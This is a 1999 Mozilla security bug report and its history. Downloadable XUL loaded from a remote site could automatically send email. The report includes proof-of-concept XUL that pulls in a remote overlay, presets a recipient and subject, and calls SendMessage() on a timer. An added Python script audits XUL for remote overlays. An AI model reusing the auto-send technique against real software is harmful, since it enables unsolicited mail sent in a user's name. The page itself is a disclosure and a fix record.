Closed Bug 12934 Opened 25 years ago Closed 25 years ago

Downloadable XUL allows automatically sending email

Categories

(Core :: Security, defect, P3)

x86
Windows 95
defect

VERIFIED FIXED

People

(Reporter: joro, Assigned: norrisboyd)

Details

There is a security vulnerability in build 1999082116 (guess others) which allows automatically sending email using downloadable XUL. [I could not make Messenger send a message even from Messenger in this build, but the demonstration opens a TCP connection to port 25 of the SMTP server and this is enough for me.]

Demonstration is available at: http://www.nat.bg/~joro/mozilla/msg/send.html

The code is:

In addressingWidgetOverlay.xul the following is modified:

<html:input id="msgRecipient#1" value="nobodyx@nosuchdomain.com" ...

In messengercompose.xul the following is modified:

<?xul-overlay href="http://www.nat.bg/~joro/mozilla/msg/addressingWidgetOverlay.xul"?>
.....
<html:input id="msgSubject" value="Test for automatically sending messages" type="text" flex="80%" onkeyup="SetComposeWindowTitle(event.which);"/>
.....
setTimeout("alert('Trying to send message');SendMessage();",20000);
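An audit check for the pattern in the report above, added here as an example and not part of the original bug or of Mozilla's code: it lists every xul-overlay processing instruction in a XUL document and flags those that resolve outside packaged UI. The scheme allow-list, the function names and the sample document are assumptions made for illustration.

```python
import re
from urllib.parse import urlsplit
from xml.dom import minidom

# Assumption: only these schemes name packaged, locally installed UI files.
PACKAGED_SCHEMES = {"chrome", "resource"}
PSEUDO_ATTR = re.compile(r'([\w-]+)\s*=\s*(["\'])(.*?)\2')

def overlay_hrefs(node):
    """Yield the href of each <?xul-overlay?> instruction, in document order."""
    if node.nodeType == node.PROCESSING_INSTRUCTION_NODE and node.target == "xul-overlay":
        attrs = {m.group(1): m.group(3) for m in PSEUDO_ATTR.finditer(node.data)}
        if "href" in attrs:
            yield attrs["href"]
    for child in node.childNodes:
        yield from overlay_hrefs(child)

def audit_overlays(xul_text, document_url):
    """Return (href, verdict) pairs; verdict is 'packaged' or 'remote'."""
    findings = []
    for href in overlay_hrefs(minidom.parseString(xul_text)):
        # A relative href inherits the origin of the document that references it.
        scheme = (urlsplit(href).scheme or urlsplit(document_url).scheme).lower()
        findings.append((href, "packaged" if scheme in PACKAGED_SCHEMES else "remote"))
    return findings

# Constructed sample: a compose-window document with one packaged and one remote overlay.
SAMPLE_XUL = """<?xul-overlay href="chrome://example/content/local-overlay.xul"?>
<?xul-overlay href="http://remote.example/addressingWidgetOverlay.xul"?>
<window xmlns="http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul">
  <box id="compose"/>
</window>
"""

if __name__ == "__main__":
    for href, verdict in audit_overlays(SAMPLE_XUL, "chrome://example/content/compose.xul"):
        print(f"{verdict:9} {href}")
```

A "remote" verdict means the overlay's markup and script would be merged into a window that can reach application functions, which is the condition the report describes.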
Status: NEW → ASSIGNED
Summary: Downloadable XUL allows automatically sending of email → Downloadable XUL allows automatically sending email
Another use of XPAppCoresManager.
Target Milestone: M11
Blocks: 12633
Depends on: 13021
Move security bugs from M11 to M13; needed for beta but not for dogfood.
Status: ASSIGNED → RESOLVED
Closed: 25 years ago
Resolution: --- → FIXED
XPAppCoresManager finally died, closing this security hole.
Verified fixed.
Status: RESOLVED → VERIFIED
Bulk moving all Browser Security bugs to new Security: General component. The previous Security component for Browser will be deleted.
Component: Security → Security: General